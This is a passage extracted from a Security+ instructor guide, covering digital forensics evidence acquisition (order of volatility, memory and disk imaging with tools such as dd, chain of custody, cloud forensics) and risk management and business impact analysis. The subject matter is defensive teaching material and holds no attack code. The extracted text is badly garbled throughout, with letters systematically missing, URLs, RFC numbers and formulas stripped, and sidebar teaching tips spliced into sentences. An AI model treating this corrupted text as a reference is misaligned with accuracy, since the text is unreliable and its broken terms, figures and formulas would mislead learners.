your-own-device (BYOD) policies. or e ample, if an employee is accused of fraud
you must verify that the employee's e uipment and data can be legally sei ed and
searched. Any mistake may make evidence gained from the search inadmissible.
Data acquisition is also complicated by the fact that it is more difficult to capture
evidence from a digital crime scene than it is from a physical one. ome evidence will
be lost if the computer system is powered o on the other hand, some evidence may
be unobtainable until the system is powered o . Additionally, evidence may be lost
depending on whether the system is shut down or fro en by suddenly disconnecting
the power.
Data ac uisition usually proceeds by using a tool to make an image from the data
held on the target device. An image can be ac uired from either volatile or nonvolatile
storage. The general principle is to capture evidence in the order of volatility, from
more volatile to less volatile. The I C best practice guide to evidence collection
and archiving, published as tools.ietf.org html rfc , sets out the general order as
follows:
1. C registers and cache memory including cache on disk controllers, s, and
so on .
2. Contents of nonpersistent system memory AM , including routing table, A
cache, process table, kernel statistics.
3. Data on persistent mass storage devices DDs, Ds, and ash memory devices
• artition and file system blocks, slack space, and free space.
• ystem memory caches, such as swap space virtual memory and
hibernation files.
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 491

• Temporary file caches, such as the browser cache.

• ser, application, and files and directories.

4. emote logging and monitoring data.

5. hysical configuration and network topology.

6. Archival media and printed documents.

The indows registry is mostly stored on disk, but there are keys notably
ardware that only ever exist in memory. The contents of the registry can be analyzed via
a memory dump.

Digital Forensics Software Show Slide(s)

Digital forensics software is designed to assist the acquisition, documentation, and Digital Forensics
analysis of digital evidence. Most of the commercial forensics tools are available for the oftware
indows platform only.
• nCase orensic is a digital forensics case management product created by
uidance oftware guidancesoftware.com encase forensic cmpid nav r . Case
management is assisted by built in pathways, or work ow templates, showing the
key steps in diverse types investigation. In addition to the core forensics suite, there
are separate products for e discovery digital evidence management and ndpoint
Investigator for over the network analysis of corporate desktops and servers .

• The Forensic Toolkit (FTK) from AccessData (accessdata.com products services

forensic toolkit ftk is another commercial investigation suite designed to run on
indows erver or server cluster . Show Slide(s)

• The Sleuth Kit (sleuthkit.org is an open source collection of command line tools ystem Memory
and programming libraries for disk imaging and file analysis. Autopsy is a graphical Acquisition
front end for these tools and acts as a case management work ow tool. The
program can be e tended with plug ins for various analysis functions. Autopsy is Teaching
available for indows and can be compiled from the source code to run on Linu . Tip
Remind students
• WinHex from ays ways.net winhe is a commercial tool for forensic recovery that there is no
and analysis of binary data, with support for a range of file systems and memory physical evidence
dump types depending on version . to validate a system
memory image, so
• The olatility ramework github.com volatilityfoundation volatility is widely used the provenance of the
for system memory analysis. capture can only be
established by video
recording the process.
System Memory Acquisition Note that one of the
functions of EDR
ystem memory is volatile data held in andom Access Memory AM modules. is to perform live
olatile means that the data is lost when power is removed. A system memory memory capture when
suspicious activity is
dump creates an image file that can be analy ed to identify the processes that are detected (carbonblack.
running, the contents of temporary file systems, registry data, network connections, com blog using
cryptographic keys, and more. It can also be a means of accessing data that is carbon black with
encrypted when stored on a mass storage device. There are various methods of volatility for detecting
collecting the contents of system memory. memory attacks .

Lesson 18: Explaining Digital Forensics | Topic 18B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 492 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

iewing the process list in a memory dump using the olatility ramework.
(Screenshot olatility ramework volatilityfoundation.org.)

Live Acquisition
A specialist hardware or software tool can capture the contents of memory while the
host is running. nfortunately, this type of tool needs to be preinstalled as it re uires a
kernel mode driver to dump any data of interest. ome e amples for indows include
WinHex ( ways.net winhe , Memory e from ire ye fireeye.com services freeware
memory e.html , and esponse TACTICAL f response.com software tac .
On Linux, a user mode tool, such as memdump (porcupine.org forensics tct.html
or dd, can be run against the /dev/mem device file. owever, on most modern
distributions, access to this file is blocked. The olatility ramework github.com
volatilityfoundation/volatility includes a tool to install a kernel driver pmem .
The fmem and LiM kernel utilities provide similar functionality.

Crash Dump
hen indows encounters an unrecoverable kernel error, it can write contents of
memory to a dump file at C indows M M .DM . n modern systems, there is
unlikely to be a complete dump of all the contents of memory, as these could take up
a lot of disk space. owever, even mini dump files, stored in C indows Minidumps,
may be a valuable source of information.

i ernation ile and a efile

A hibernation file is created on disk in the root folder of the boot volume when
a indows host is put into a sleep state. If it can be recovered, the data can be
decompressed and loaded into a software tool for analysis. The drawback is that
network connections will have been closed, and malware may have detected the use of
a sleep state and performed anti-forensics.

Lesson 18: Explaining Digital Forensics | Topic 18B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 493

The pagefile swap file swap partition stores pages of memory in use that e ceed
the capacity of the host's AM modules. The pagefile is not structured in a way that
analysis tools can interpret, but it is possible to search for strings.

Disk Image Acquisition Show Slide(s)

Disk image ac uisition refers to ac uiring data from nonvolatile storage. Nonvolatile Disk Image Acquisition
storage includes hard disk drives DDs , solid state drives Ds , firmware, other
types of ash memory thumb drives and memory cards , and optical media CD,
D D, and lu ay . This can also be referred to as device ac uisition, meaning the D
storage in a smartphone or media player. Disk ac uisition will also capture the
installation, if the boot volume is included.
There are three device states for persistent storage ac uisition
• Live ac uisition this means copying the data while the host is still running. This
may capture more evidence or more data for analysis and reduce the impact on
overall services, but the data on the actual disks will have changed, so this method
may not produce legally acceptable evidence. It may also alert the adversary and
allow time for them to perform anti forensics.
• tatic ac uisition by shutting down the host this runs the risk that the malware will
detect the shutdown process and perform anti forensics to try to remove traces of
itself.
• tatic ac uisition by pulling the plug this means disconnecting the power at the
wall socket not the hardware power o button . This is most likely to preserve the
storage devices in a forensically clean state, but there is the risk of corrupting data.
iven sufficient time at the scene, you may decide to perform both a live and static
ac uisition. hichever method is used, it is imperative to document the steps taken
and supply a timeline for your actions.
There are many I imaging utilities, including those packaged with suites such as the
orensic Toolkit and its T Imager. ou should note that the nCase forensics suite
uses a vendor file format .e compared to the raw file format used by Linu tools
like dd. The file format is important when it comes to selecting a tool for analy ing the
image. The .eo format allows image metadata such as the checksum, drive geometry,
and ac uisition time to be stored within the same file. The open source Advanced
orensic ormat A provides similar features.
If no specialist tool is available, on a Linu host you can use the dd command to make
a copy of an input file if= to an output file of= and apply optional conversions to
the file data. In the following sda is the fi ed drive
dd if=/dev/sda of=/mnt/usbstick/backup.img
A more recent fork of dd is dc dd, which provides additional features like multiple
output files and e act match verification.

Using dc dd (a version of dd with additional forensics functionality created by the o )

and generating a hash of the source-disk data (sda).

Lesson 18: Explaining Digital Forensics | Topic 18B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 494 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Show Slide(s)
reservation and
Integrity of Evidence
Teaching
Tip
Note that imaging
tools make bit level
copies of the media.
They do not use the
file system to
mediate access. This
allows them to capture
artifacts that may be
hidden from the file
system.
If necessary, remind
students how
cryptographic hash
functions prove
integrity.
Show Slide(s)
Acquisition of Other
Data
Lesson 18: Explaining Digital Forensics | Topic 18B
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Preservation and Integrity of Evidence
It is vital that the evidence collected at the crime scene conform to a valid timeline.
Digital information is susceptible to tampering, so access to the evidence must be
tightly controlled. ecording the whole process establishes the provenance of the
evidence as deriving directly from the crime scene.
To obtain a forensically sound image from nonvolatile storage, you need to ensure that
nothing you do alters data or metadata properties on the source disk or file system. A
write blocker assures this process by preventing any data on the disk or volume from
being changed by filtering write commands at the driver and level. Data ac uisition
would normally proceed by attaching the target device to a forensics workstation or
field capture device e uipped with a write blocker.
Data Acquisition with Integrity and Non-Repudiation
nce the target disk has been safely attached to the forensics workstation, data
acquisition proceeds as follows:
1. A cryptographic hash of the disk media is made, using either the MD or A
hashing function. The output of the function can be described as a checksum.
2. A bit by bit copy of the media is made using the imaging utility.
3. A second hash is then made of the image, which should match the original hash
of the media.
4. A copy is made of the reference image, validated again by the checksum. Analysis
is performed on the copy.
This proof of integrity ensures non repudiation. If the provenance of the evidence
is certain, the threat actor identified by analysis of the evidence cannot deny their
actions. The checksums prove that no modification has been made to the image.
In practical terms, the image ac uisition software will perform the verification steps as part
of the ac uisition process, but in theory you could use separate tools to perform each stage
individually.
Preservation of Evidence
The host devices and media taken from the crime scene should be labeled, bagged,
and sealed, using tamper evident bags. It is also appropriate to ensure that the
bags have antistatic shielding to reduce the possibility that data will be damaged
or corrupted on the electronic media by electrostatic discharge D . ach piece of
evidence should be documented by a chain of custody form which records where,
when, and who collected the evidence, who subse uently handled it, and where it
was stored.
The evidence should be stored in a secure facility this not only means access control,
but also environmental control, so that the electronic systems are not damaged by
condensation, D, fire, and other ha ards. imilarly, if the evidence is transported, the
transport must also be secure.
Acquisition of Other Data
There are other potential sources of forensic data within computer systems and
networks, though they can be hard to ac uire or to prove as admissible.
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 495

Network
acket captures and traffic ows can contain very valuable evidence, if the capture was
running at the right time and in the right place to record the incident. As with memory
forensics, the issue for forensics lies in establishing the integrity of the data. Most
network data will come from a I M.

Cache
Cache can refer either to hardware components or software. oftware based cache is
stored in the file system and can be ac uired as part of a disk image. or e ample, each
brower has a cache of temporary files, and each user profile has a cache of temp files.
ome cache artifacts generated by the and applications are held in memory only,
such as portions of the registry, cryptographic keys, password hashes, some types of
cookies, and so on. The contents of hardware cache C registers and disk controller
read write cache, for instance is not generally recoverable.

Artifacts and Data Recovery

Artifacts refers to any type of data that is not part of the mainstream data structures
of an operating system. or e ample, the indows Alternate Data Streams (ADS)
feature is often used to conceal file data, and various caches, such as prefetch and
Amcache, can be used to find indicators of suspicious process behavior.
Data recovery refers to analy ing a disk or image of a disk for file fragments stored in
slack space. These fragments might represent deleted or overwritten files. The process
of recovering them is referred to as carving.

Using Autopsy for file carving a disk image. The selected Courses folder and the P files in it were deleted
and so are agged as unallocated. ecause this image was captured soon after deletion, the file contents
are easily recoverable, however. (Screenshot Autopsy the Sleuth it sleuthkit.org autopsy.)

Snapshot
A snapshot is a live ac uisition image of a persistent disk. hile this may have less
validity than an image taken from a device using a write blocker, it may be the only
means of ac uiring data from a virtual machine or cloud process.

Lesson 18: Explaining Digital Forensics | Topic 18B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 496 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Show Slide(s)
Digital Forensics for
Cloud
Teaching
Tip
Note that these issues
have to be considered
and resolved well in
advance of an actual
incident.
Lesson 18: Explaining Digital Forensics | Topic 18B
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Firmware
irmware is usually implemented as ash memory. ome types, such as the C
firmware, can potentially be e tracted from the device or from system memory using
an imaging utility. It likely will be necessary to use specialist hardware to attach the
device to a forensic workstation, however.
Digital Forensics for Cloud
ith an on premises investigation, the right to sei e and analy e devices is usually
fairly unproblematic. There may be availability issues with taking a system out of
service, and bring your own device policies can be more comple , but essentially as all
the e uipment is the company's property, there are no third party obstacles.
hile companies can operate private clouds, forensics in a public cloud are
complicated by the right to audit permitted to you by your service level agreement
LA with the cloud provider. Two more issues with forensics investigations of cloud
hosted processing and data services are as follows:
• The on demand nature of cloud services means that instances are often created
and destroyed again, with no real opportunity for forensic recovery of any data.
Cloud providers can mitigate this to some e tent with e tensive logging and
monitoring options. A C might also provide an option to generate file system
and memory snapshots from containers and VMs in response to an alert condition
generated by a I M.
• Chain of custody issues are comple and might have to rely on the C to select and
package data for you. The process should be documented and recorded as closely
as is possible.
• Jurisdiction and data sovereignty may restrict what evidence the C is willing to
release to you.
• If the C is a data processor, it will be bound by data breach notification laws and
regulations. Coordinating the timing of notification and contact with the regulator
between your organi ation and the C can be e tremely comple , especially if
there is an ongoing incident re uiring confidentiality.
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 497

Review Activity:
igital orensics E idence Ac uisition
Answer the following questions:

1. You must recover the contents of the ARP cache as vital evidence of a man-
in-the-middle attack. Should you shut down the PC and image the hard drive
to preser e it

No, the A cache is stored in memory and will be discarded when the computer is
powered o . ou can either dump the system memory or run the arp utility and make
a screenshot. In either case, make sure that you record the process and e plain your
actions.

2. Which command line tool allows image creation from disk media on any
inu host

The dd tool is installed on all Linu distributions.

3. True or alse To ensure e idence inte rit ou must ma e a hash o the

media before making an image.

True.

4. hat t pe o orensic data is reco ered usin a car in tool

A carving tool allows close inspection of an image to locate artifacts. Artifacts are data
ob ects and structures that are not obvious from e amination by ordinary file browsing
tools, such as alternate data streams, cache entries, and deleted file remnants.

Lesson 18: Explaining Digital Forensics | Topic 18B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 498 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Lesson 18
Summary
Teaching ou should be able to e plain key aspects of digital forensics, including the secure
Tip ac uisition and handling of evidence.
Check that students
are confident about
the content that has
Guidelines for Digital Forensics
been covered. If there Follow these guidelines for supporting forensics investigations:
is time, revisit any
content examples that • Develop or adopt a consistent process for incident responders to handle and
they have questions preserve forensic data:
about. If you have
used all the available • Consider the order of volatility and potential loss of evidence if a host is shut
time for this lesson
down or powered o .
block, note the issues,
and schedule time for
• Record evidence collection using video and interview witnesses to gather
a review later in the
course. statements.

• Deploy tools, such as in e , Autopsy, or T Imager, that can capture and

validate evidence from persistent and nonpersistent media.

• stablish a method for recovering forensic data from a C .

• Document evidence using a chain of custody.

• e aware of the potential for forensic evidence as a source of strategic intelligence

and counterintelligence.

Lesson 18: Explaining Digital Forensics

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Lesson 19
Summarizing Risk
anagement oncepts

LESSON INTRODUCTION Teaching

Tip
If a company operates with one or more vulnerable business processes, it could result This lesson returns to
in disclosure, modification, loss, destruction, or interruption of critical data or it could the "identify" function.
lead to loss of service to customers. uite apart from immediate financial losses arising While we have already
from such security incidents, either outcome will reduce a company's reputation. If a examined practical
bank lost its trading oor link to its partners, even for an hour, since the organi ation's security assessment
tools and procedures,
primary function trading would be impossible, huge losses may result. Conse uently,
this lesson considers
when planning a network or other IT system, you must perform risk management to wider ERM processes.
assess threats and vulnerabilities.
Analy ing risk plays a ma or role in ensuring a secure environment for an organi ation.
y assessing and identifying specific risks that can cause damage to network
components, hardware, and personnel, you can mitigate possible threats and establish
the right corrective measures to avoid losses and liabilities.

Lesson Objectives
In this lesson, you will:
• plain risk management processes and concepts.

• Explain business impact analysis concepts.

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 500 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Topic A
Explain isk anagement
rocesses and oncepts

Teaching EXAM OBJECTIVES COVERED

Tip 5.4 Summarize risk management processes and concepts
This topic shows
how cybersecurity
procedures fit Most organi ations have formal risk management policies and processes, both to
within an overall risk meet compliance re uirements and to make the business secure. These policies and
management process.
processes are usually driven by frameworks and come with some standard terminology
to describe factors and procedures within the overall process. It is vital that you be
able to summari e the key concepts of risk management, so that you can participate in
these important assessments.

Show Slide(s) Risk Management Processes

isk Management
Risk management is a process for identifying, assessing, and mitigating vulnerabilities
Processes and threats to the essential functions that a business must perform to serve its
customers. ou can think of this process as being performed over five phases
1. Identify mission essential functions mitigating risk can involve a large amount
of e penditure so it is important to focus e orts. ective risk management must
focus on mission essential functions that could cause the whole business to fail if
they are not performed. art of this process involves identifying critical systems
and assets that support these functions.

2. Identify vulnerabilities for each function or work ow starting with the most
critical , analy e systems and assets to discover and list any vulnerabilities or
weaknesses to which they may be susceptible.

3. Identify threats for each function or work ow, identify the threat sources and
actors that may take advantage of or e ploit or accidentally trigger vulnerabilities.

4. Analy e business impacts the likelihood of a vulnerability being activated as a

security incident by a threat and the impact of that incident on critical systems are
the factors used to assess risk. There are uantitative and ualitative methods of
analy ing impacts and likelihood.

5. Identify risk response—for each risk, identify possible countermeasures and

assess the cost of deploying additional security controls. Most risks re uire some
sort of mitigation, but other types of response might be more appropriate for
certain types and level of risks.

or each business process and each threat, you must assess the degree of risk that
e ists. Calculating risk is comple , but the two main variables are likelihood and impact
• Likelihood of occurrence is the probability of the threat being reali ed.

• Impact is the severity of the risk if reali ed as a security incident. This may be
determined by factors such as the value of the asset or the cost of disruption if the
asset is compromised.

esson 1 Summarizing isk anagement Concepts | Topic 1 A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 501

isk management is comple and treated very di erently in companies and institutions
of di erent si es, and with di erent regulatory and compliance re uirements. Most
companies will institute enterprise risk management (ERM) policies and procedures,
based on frameworks such as NI T's isk Management ramework M or I .
These legislative and framework compliance re uirements are often formali ed as
a isk and Control elf Assessment C A . An organi ation may also contract an
e ternal party to lead the process, in which case it is referred to as a isk and Control
Assessment CA .
A C A is an internal process undertaken by stakeholders to identify risks and the
e ectiveness with which controls mitigate those risks. C As are often performed
through uestionnaires and workshops with department managers. The outcome of an
C A is a report. p to date C A reports are critical to the e ternal audit process.

Risk Types Show Slide(s)

eneral types of risks can be identified as arising from specific threat and vulnerability isk Types
scenarios.

External
ternal threat actors are one highly visible source of risk. ou must also consider
wider threats than those of cyberattack. Natural disasters, such as the C ID
pandemic, illustrate the need to have IT systems and work ows that are resilient to
widespread dislocation. The most critical type of impact is one that could lead to loss
of life or critical in ury. The most obvious risks to life and safety come from natural
disasters, person made disasters, and accidents, such as fire.

Internal
Internal risks come from assets and work ows that are owned and managed by your
organi ation. hen reviewing internal risks, it is important to remember that these can
be classed as malicious and accidental or non malicious. Internal threats can include
contractors granted temporary access.

Multiparty
Multiparty risk is where an adverse event impacts multiple organi ations. Multiparty
risk usually arises from supplier relationships. If a critical event disrupts a supplier or
customer, then your own organi ation will su er. These are often described as ripple
impacts. or e ample, if one of your top five customers goes out of business because
of a data breach, your company will lose substantial revenue. rgani ations in these
supply chain relationships have an interest in promoting cybersecurity awareness and
capability throughout the chain.
As an illustration of how risk assessments can change in view of multiparty
relationship, consider a company that makes wireless adapters, originally for use
with laptops. In the original usage, the security of the firmware upgrade process is
important, but it has no impact on life or safety. The company, however, earns a
new contract to supply the adapters to provide connectivity for in vehicle electronics
systems. nknown to the company, a weakness in the design of the in vehicle system
allows an adversary to use compromised wireless adapter firmware to a ect the car's
control systems. The integrity of the upgrade process now has an impact on safety, and
is much higher risk.

Intellectual Property (IP) Theft

Intellectual property I is data of commercial value that is owned by the organi ation.
This can mean copyrighted material for retail software, written work, video, and

esson 1 Summarizing isk anagement Concepts | Topic 1 A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 502 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

music and product designs and patents. If I data is e filtrated it will lose much of its
commercial value. Losses can be very difficult to recover in territories where there are
not strong legal protections.

Software Compliance/Licensing
reaking the terms of the end user licensing agreement LA that imposes conditions
on installation of the software can e pose the computer owner to substantial fines.
License issues are most likely to arise from shadow IT, where users install software
without change control approval. Network inventory management suites can report
software installations on each host and correlate those with the number of license
seats purchased. Licensing models can also be comple , especially where virtuali ation
and the cloud are concerned. It is important to train the administrative sta on the
specific license terms for each product.

Legacy Systems
Legacy systems are a source of risk because they no longer receive security updates
and because the expertise to maintain and troubleshoot them is a scarce resource.

Show Slide(s) Quantitative Risk Assessment

Quantitative Risk
There are uantitative and ualitative methods of performing risk analysis to evaluate
Assessment likelihood and impact.

Teaching
Tip
Students need to learn
these metrics.

uantitative risk assessment aims to assign concrete values to each risk factor. (Image 1 .com.)

uantitative risk assessment aims to assign concrete values to each risk factor.
• Single Loss Expectancy (SLE) the amount that would be lost in a single
occurrence of the risk factor. This is determined by multiplying the value of the
asset by an Exposure Factor (EF). is the percentage of the asset value that would
be lost.

esson 1 Summarizing isk anagement Concepts | Topic 1 A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 503

• Annualized Loss Expectancy (ALE)—the amount that would be lost over the
course of a year. This is determined by multiplying the L by the Annualized Rate
of Occurrence (ARO).

It is important to reali e that the value of an asset does not refer solely to its material
value. The two principal additional considerations are direct costs associated with the
asset being compromised downtime and conse uent costs to intangible assets, such
as the company's reputation. For example, a server may have a material cost of a few
hundred dollars. If the server were stolen, the costs incurred from not being able to
do business until it can be recovered or replaced could run to thousands of dollars.
In addition, that period of interruption where orders cannot be taken or go unfulfilled
leads customers to look at alternative suppliers, resulting in perhaps more thousands
of lost sales and goodwill.
The problem with uantitative risk assessment is that the process of determining and
assigning these values is comple and time consuming. The accuracy of the values
assigned is also difficult to determine without historical data often, it has to be based
on sub ective guesswork . owever, over time and with e perience, this approach can
yield a detailed and sophisticated description of assets and risks and provide a sound
basis for ustifying and prioriti ing security e penditure.

Qualitative Risk Assessment Show Slide(s)

ualitative risk assessment avoids the comple ity of the uantitative approach and Qualitative Risk
is focused on identifying significant risk factors. The ualitative approach seeks out Assessment
people's opinions of which risk factors are significant. Assets and risks may be placed
in simple categories. or e ample, assets could be categori ed as Irreplaceable, igh
alue, Medium alue, and Low alue risks could be categori ed as one o or recurring
and as Critical, igh, Medium, and Low probability.
Another simple approach is the heat map or Traffic Light impact matri . or each risk,
a simple Red, Yellow, or Green indicator can be put into each column to represent the
severity of the risk, its likelihood, cost of controls, and so on. This approach is simplistic
but does give an immediate impression of where e orts should be concentrated to
improve security.

Traffic light impact grid.

I nvlpubs.nist.gov nistpubs I NI T. I . .pdf discusses how to apply

security categori ations C to information systems based on the impact that a breach
of confidentiality, integrity, or availability would have on the organi ation as a whole.
otential impacts can be classified as

esson 1 Summarizing isk anagement Concepts | Topic 1 A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 504 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

• Low minor damage or loss to an asset or loss of performance though essential

functions remain operational .

• Moderate significant damage or loss to assets or performance.

• igh ma or damage or loss or the inability to perform one or more essential

functions.

Show Slide(s) Risk Management Strategies

isk Management
The result of a uantitative or ualitative analysis is a measure of inherent risk.
trategies Inherent risk is the level of risk before any type of mitigation has been attempted.
In theory, security controls or countermeasures could be introduced to address
Teaching
every risk factor. The difficulty is that security controls can be e pensive, so you must
Tip
balance the cost of the control with the cost associated with the risk. It is not possible
Make sure students to eliminate risk rather the aim is to mitigate risk factors to the point where the
can distinguish types
organi ation is e posed only to a level of risk that it can a ord. The overall status of
of risk response.
risk management is referred to as risk posture. isk posture shows which risk response
options can be identified and prioriti ed. or e ample, you might identify the following
priorities:
• egulatory re uirements to deploy security controls and make demonstrable e orts
to reduce risk. amples of legislation and regulation that mandate risk controls
include , I AA, ramm Leach liley, the omeland ecurity Act, CI D
regulations, and various personal data protection measures.

• igh value asset, regardless of the likelihood of the threat s .

• Threats with high likelihood that is, high A .

• rocedures, e uipment, or software that increase the likelihood of threats for

e ample, legacy applications, lack of user training, old software versions, unpatched
software, running unnecessary services, not having auditing procedures in place,
and so on .

In the uantitative approach, the eturn on Security Investment ( OSI) can be determined
by calculating a new A E, based on the reduction in loss that will be created by the security
controls introduced. The formula for calculating OSI is (A E A Em) Cost of Solution
Cost of Solution, where A E is the A E before controls and A Em is after controls.

Risk mitigation (or remediation) is the overall process of reducing e posure to or

the e ects of risk factors. If you deploy a countermeasure that reduces e posure to
a threat or vulnerability that is risk deterrence (or reduction). Risk reduction refers
to controls that can either make a risk incident less likely or less costly (or perhaps
both . or e ample, if fire is a threat, a policy strictly controlling the use of ammable
materials on site reduces likelihood while a system of alarms and sprinklers reduces
impact by hopefully containing any incident to a small area. Another e ample is
o site data backup, which provides a remediation option in the event of servers being
destroyed by fire.

Show Slide(s) Risk Avoidance and Risk Transference

Risk Avoidance and
Avoidance means that you stop doing the activity that is risk bearing. or e ample, a
isk Transference company may develop an in house application for managing inventory and then try
to sell it. If while selling it, the application is discovered to have numerous security
vulnerabilities that generate complaints and threats of legal action, the company may
make the decision that the cost of maintaining the security of the software is not worth

esson 1 Summarizing isk anagement Concepts | Topic 1 A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 505

the revenue and withdraw it from sale. bviously this would generate considerable bad
feeling among e isting customers. Avoidance is not often a credible option.
Transference (or sharing) means assigning risk to a third party, such as an insurance
company or a contract with a supplier that defines liabilities. or e ample, a company
could stop in house maintenance of an e commerce site and contract the services to
a third party, who would be liable for any fraud or data theft. pecific cybersecurity
insurance or cyberliability coverage protects against fines and liabilities arising from
data breaches and Do attacks.

ote that in this sort of case it is relatively simple to transfer the obvious risks, but risks to
the company s reputation remain. If a customer s credit card details are stolen because
they used your unsecure e-commerce application, the customer won t care if you or a third
party were nominally responsible for security. It is also unlikely that legal liabilities could be
completely transferred in this way. or example, insurance terms are likely to re uire that
best practice risk controls have been implemented.

Risk Acceptance and Risk Appetite Show Slide(s)

It is not possible to reduce risks to ero, so part of risk posture is concerned with Risk Acceptance and
managing what risks remain. Risk Appetite

Risk Acceptance Teaching

Tip
Risk acceptance or tolerance means that no countermeasures are put in place either
Make sure students
because the level of risk does not ustify the cost or because there will be unavoidable can distinguish these
delay before the countermeasures are deployed. In this case, you should continue to terms, especially
monitor the risk as opposed to ignoring it . inherent, residual, and
control risk.
Residual Risk and Risk Appetite
here inherent risk is the risk before mitigation, residual risk is the likelihood
and impact after specific mitigation, transference, or acceptance measures have
been applied. isk appetite is a strategic assessment of what level of residual risk is
tolerable. Risk appetite is broad in scope. Where risk acceptance has the scope of a
single system, risk appetite has a pro ect or institution wide scope. isk appetite is
constrained by regulation and compliance.

Control Risk
Control risk is a measure of how much less e ective a security control has become
over time. or e ample, antivirus became uite capable of detecting malware on the
basis of signatures, but then less e ective as threat actors started to obfuscate code.
Control risk can also refer a security control that was never e ective in mitigating
inherent risk. This illustrates the point that risk management is an ongoing process,
re uiring continual reassessment and re prioriti ation.

Risk Awareness Show Slide(s)

To ensure that the business stakeholders understand each risk scenario, you should Risk Awareness
articulate it such that the cause and e ect can clearly be understood by the owner
of the asset. A Do risk should be put into plain language that describes how the risk
would occur and, as a result, what access is being denied to whom, and the e ect to
the business. or e ample As a result of malicious or hacking activity against the
public website, the site may become overloaded, preventing clients from accessing
their client order accounts. This will result in a loss of sales for so many hours and a
potential loss of revenue of so many dollars."

esson 1 Summarizing isk anagement Concepts | Topic 1 A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 506 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

A risk register is a document showing the results of risk assessments in a

comprehensible format. The register may resemble the heat map risk matrix
shown earlier with columns for impact and likelihood ratings, date of identification,
description, countermeasures, owner route for escalation, and status. isk registers
are also commonly depicted as scatterplot graphs, where impact and likelihood
are each an a is, and the plot point is associated with a legend that includes more
information about the nature of the plotted risk. A risk register should be shared
between stakeholders e ecutives, department managers, and senior technicians so
that they understand the risks associated with the work ows that they manage.

esson 1 Summarizing isk anagement Concepts | Topic 1 A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 507

e ie Acti ity
Risk Management
rocesses and oncepts
Answer the following uestions

1. hat areas o a usiness or or o must ou e amine to assess

multiparty risk?

You need to examine supply chain dependencies to identify how problems with one
or more suppliers would impact your business. You also need to examine customer
relationships to determine what liabilities you have in the event of an incident
impacting your ability to supply a product or service and what impact disruption
of important customer accounts would have, should cyber incidents disrupt their
business.

2. What risk type arises from shadow IT?

hadow IT is the deployment of hardware, software, or cloud services without the

sanction of the system owner typically the IT department . The system owner will
typically be liable for software compliance licensing risks.

3. What metric(s) could be used to make a quantitative calculation of risk due

to a specific threat to a specific unction or asset

ingle Loss pectancy L or Annual Loss pectancy AL . AL is L multiplied by

A Annual ate of ccurrence .

4. What factors determine the selection of security controls in terms of an

overall budget?

The risk as determined by impact and likelihood compared to the cost of the control.
This metric can be calculated as eturn on ecurity Investment I.

5. hat t pe o ris miti ation option is o ered purchasin insurance

Risk transference.

6. What is a risk register?

A document highlighting the results of risk assessments in an easily comprehensible

format such as a heat map or traffic light grid . Its purpose is for department
managers and technicians to understand risks associated with the work ows that
they manage.

7. What is control risk?

Control risk arises when a security control is ine ective at mitigating the impact and or
likelihood of the risk factor it was deployed to mitigate. The control might not work as
hoped, or it might become less e ective over time.

esson 1 Summarizing isk anagement Concepts | Topic 1 A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 508 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Topic
Explain usiness Impact
Analysis oncepts

Teaching EXAM OBJECTIVES COVERED

Tip 5.4 Summarize risk management processes and concepts
This topic completes
the coverage of the
risk management
ob ective by looking at
usiness impact analysis informs risk assessment by documenting the work ows that
disasters and business run the organi ation and the critical assets and systems that support them. ey metrics
impact analysis. uantify how much downtime those systems can withstand. As a security professional,
you will often be asked to produce this type of analysis.

Show Slide(s) Business Impact Analysis

Business Impact
Business impact analysis (BIA) is the process of assessing what losses might occur
Analysis for a range of threat scenarios. or instance, if a DDo attack suspends an e commerce
portal for five hours, the business impact analysis will be able to uantify the losses
Teaching from orders not made and customers moving permanently to other suppliers based
Tip on historic data. The likelihood of a Do attack can be assessed on an annuali ed basis
Contrast the impact to determine annuali ed impact, in terms of costs. ou then have the information
analysis activity with re uired to assess whether a security control, such as load balancing or managed
the continuity analysis DDo mitigation, is worth the investment.
activity. Impact
analysis prioriti es here IA identifies risks, business continuity planning C identifies controls and
investment in processes that enable an organi ation to maintain critical work ows in the face of
continuity. some adverse event.

The term continuity of operations planning (COOP) refers to the same sorts of activities
